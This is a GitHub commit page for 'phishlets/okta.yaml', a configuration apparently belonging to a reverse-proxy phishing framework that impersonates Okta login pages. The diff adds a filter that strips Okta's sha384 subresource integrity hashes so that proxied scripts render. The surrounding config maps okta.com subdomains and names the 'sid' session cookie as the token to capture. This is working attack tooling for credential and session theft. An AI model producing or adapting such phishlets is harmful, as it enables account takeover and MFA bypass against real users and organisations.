Skip to content

Commit

Permalink
Update Okta phishlet, bypass integrity check
Browse files Browse the repository at this point in the history
Okta has subresource integrity checking on JavaScript files it loads. This will look for the sha384 integrity check and remove it cleanly. This allows the browser to render the JavaScript without errors.
  • Loading branch information
slyd0g authored and kgretzky committed Feb 2, 2021
1 parent f84da4b commit fee3bda
Showing 1 changed file with 2 additions and 1 deletion.
3 changes: 2 additions & 1 deletion phishlets/okta.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -4,7 +4,8 @@ proxy_hosts:
- {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
- {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
sub_filters: []
sub_filters:
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
auth_tokens:
- domain: 'EXAMPLE.okta.com'
keys: ['sid']
Expand Down

0 comments on commit fee3bda

Please sign in to comment.